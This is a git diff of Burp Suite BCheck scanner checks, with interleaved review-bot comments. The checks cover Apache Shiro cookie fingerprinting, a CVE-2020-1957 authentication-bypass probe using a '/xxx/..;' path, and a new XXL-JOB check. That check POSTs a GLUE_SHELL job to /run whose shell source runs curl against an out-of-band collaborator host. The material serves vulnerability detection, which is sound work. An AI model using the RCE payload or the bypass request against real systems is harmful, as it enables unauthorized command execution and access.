diff --git a/other/shiro/shiro_active.bcheck b/other/shiro/shiro_active.bcheck
index 39798ec..4c777bf 100644
--- a/other/shiro/shiro_active.bcheck
+++ b/other/shiro/shiro_active.bcheck
@@ -1,9 +1,9 @@
 metadata:
- language: v1-beta
- name: "Shiro Cookie Check Active"
- description: "Detects Shiro Vulnerability by Manipulating Cookie"
- author: "timeshatter"
- tags: "Shiro,active"
+ language: v1-beta
+ name: "Shiro Cookie Check Active"
+ description: "Detects Shiro Vulnerability by Manipulating Cookie"
+ author: "timeshatter"
+ tags: "Shiro,active"
 define:
 shiroExploit = "rememberMe=1"
@@ -17,8 +17,9 @@ given request then
 if "rememberMe=deleteMe" in {check.response} then
 report issue:
- severity: high
- confidence: firm
+ severity: info
+ confidence: certain
 detail: {issueDetail}
 remediation: {issueRemediation}
 end if
+ 
\ No newline at end of file
diff --git a/other/shiro/shiro_passive.bcheck b/other/shiro/shiro_passive.bcheck
index 8b251d9..37a2ae5 100644
--- a/other/shiro/shiro_passive.bcheck
+++ b/other/shiro/shiro_passive.bcheck
@@ -1,15 +1,15 @@
 metadata:
- language: v1-beta
- name: "Shiro Cookie Check Passive"
- description: "Check for Shiro Vulnerability in Response"
- author: "timeshatter"
- tags: "Shiro,passive"
+ language: v1-beta
+ name: "Shiro Cookie Check Passive"
+ description: "Check for Shiro Vulnerability in Response"
+ author: "timeshatter"
+ tags: "Shiro,passive"
 given response then
 if "rememberMe=deleteMe" in {latest.response} then
 report issue:
- severity: high
- confidence: firm
+ severity: info
+ confidence: certain
 detail: "Shiro Vulnerability Detected: rememberMe=deleteMe"
 remediation: "Investigate and fix the Shiro vulnerability immediately."
 end if
diff --git a/other/xxl-job/xxl_job_rce.bcheck b/other/xxl-job/xxl_job_rce.bcheck
new file mode 100644
index 0000000..d928b93
--- /dev/null
+++ b/other/xxl-job/xxl_job_rce.bcheck
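Review bot: The report in the second hunk of shiro_active.bcheck, and likewise in shiro_passive.bcheck, is downgraded to `severity: info` with `confidence: certain`, but the text around it still asserts a vulnerability: the passive check's context lines read `detail: "Shiro Vulnerability Detected: rememberMe=deleteMe"` and `remediation: "Investigate and fix the Shiro vulnerability immediately."`, and both files keep a `description` that says "Vulnerability". A `rememberMe=deleteMe` cookie in the response only shows that Shiro's RememberMe handling is present, so an informational finding with "fix immediately" in its remediation will mislead triage; for the passive file I would write `detail: "Apache Shiro detected: the response sets rememberMe=deleteMe"` and `remediation: "Informational fingerprint only; confirm the Shiro version in use and apply vendor updates."`. The active check's `detail: {issueDetail}` and `remediation: {issueRemediation}` are defined outside the hunk, so their wording cannot be verified here but presumably needs the same adjustment. The active hunk also appends a whitespace-only line after `end if` with no trailing newline, which should be dropped rather than committed.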
@@ -0,0 +1,25 @@
+metadata:
+ language: v1-beta
+ name: "xxl job rce"
+ description: "xxl job rce detection"
+ author: "timeshatter"
+ tags: "xxl job"
+
+define:
+ poc = `\{"jobId": 66666666,"executorHandler": "demoJobHandler","executorParams":"demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0, "logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "curl {generate_collaborator_address()}","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}`
+
+given host then
+ send request:
+ method: "POST"
+ path: "/run"
+ headers:
+ "Content-Type": "application/json"
+ body: {poc}
+
+ if any interactions then
+ report issue:
+ severity: high
+ confidence: certain
+ detail: "xxl job rce detection."
+ remediation: "Turn on the authentication component that comes with XXL-JOB."
+ end if
diff --git a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
index 7ebc312..f6718f7 100644
--- a/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
+++ b/vulnerabilities-CVEd/CVE-2020-1957-shiro_auth_bypass.bcheck
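Review bot: The `detail: "xxl job rce detection."` string in the new check gives a triager nothing about what was actually proven; since the issue is raised only on `if any interactions then`, the detail should state the evidence, e.g. `detail: "XXL-JOB executor accepted an unauthenticated job via POST /run and the scheduled job produced an out-of-band interaction."`. The fixed `path: "/run"` means the check only matches an executor served at the host root, which is presumably the usual standalone-executor deployment but not one mounted under a path prefix, and the `description` should say so. The payload carries a fixed `jobId`/`logId` and the executor presumably records a log entry for the job, so the description should also warn operators that each scan leaves that artifact on the target. The remediation would be more actionable if it named the control: `remediation: "Configure a non-empty xxl.job.accessToken on both the admin and every executor so /run rejects unauthenticated callers."`.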
@@ -1,24 +1,26 @@
 metadata:
- language: v1-beta
- name: "CVE-2020-1957 Shiro AuthBypass"
- description: "AuthBypass CVE-2020-1957"
- author: "timeshatter"
- tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
+ language: v1-beta
+ name: "CVE-2020-1957 Shiro AuthBypass"
+ description: "AuthBypass CVE-2020-1957"
+ author: "timeshatter"
+ tags: "Shiro", "AuthBypass CVE-2020-1957", "active"
 given request then
- send request called check:
- replacing headers:
- "Cookie": "rememberMe=1"
+ if not ({base.response.status_code} is "200") then
+ send request called check:
+ replacing headers:
+ "Cookie": "rememberMe=1"
- if "rememberMe=deleteMe" in {check.response} then
- send request called auth_pass_check:
- replacing path: `/xxx/..;{base.request.url.path}`
+ if "rememberMe=deleteMe" in {check.response} then
+ send request called auth_pass_check:
+ replacing path: `/xxx/..;{base.request.url.path}`
- if (not ({check.response.status_code} is "200")) and {auth_pass_check.response.status_code} is "200" then
- report issue:
- severity: high
- confidence: certain
- detail: "find shiro AuthBypass CVE-2020-1957"
- remediation: "update shiro to last."
+ if {auth_pass_check.response.status_code} is "200" then
+ report issue:
+ severity: high
+ confidence: certain
+ detail: "find shiro AuthBypass CVE-2020-1957"
+ remediation: "update shiro to last."
+ end if
 end if
- end if
+ end if
\ No newline at end of file
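Review bot: The new outer guard `if not ({base.response.status_code} is "200") then` lets any non-200 base response through, so a base request that failed for an unrelated reason (404, 500, a redirect elsewhere) combined with a 200 on the `/xxx/..;` path is now reported as a `certain` high-severity bypass, whereas the removed condition at least tied the comparison to the cookie-probe `check` response. Restrict the guard to statuses that indicate access control, e.g. `if {base.response.status_code} is "302" or {base.response.status_code} is "401" or {base.response.status_code} is "403" then`, or keep the old `check.response.status_code` comparison inside the inner condition. The report text is also too thin for a finding of this severity: `detail: "Shiro authentication bypass (CVE-2020-1957): the /xxx/..; prefixed request returned 200 while the direct request was denied."` and `remediation: "Upgrade Apache Shiro to a release that fixes CVE-2020-1957."` would replace `"find shiro AuthBypass CVE-2020-1957"` and `"update shiro to last."`. The file still ends without a trailing newline after the last `end if`.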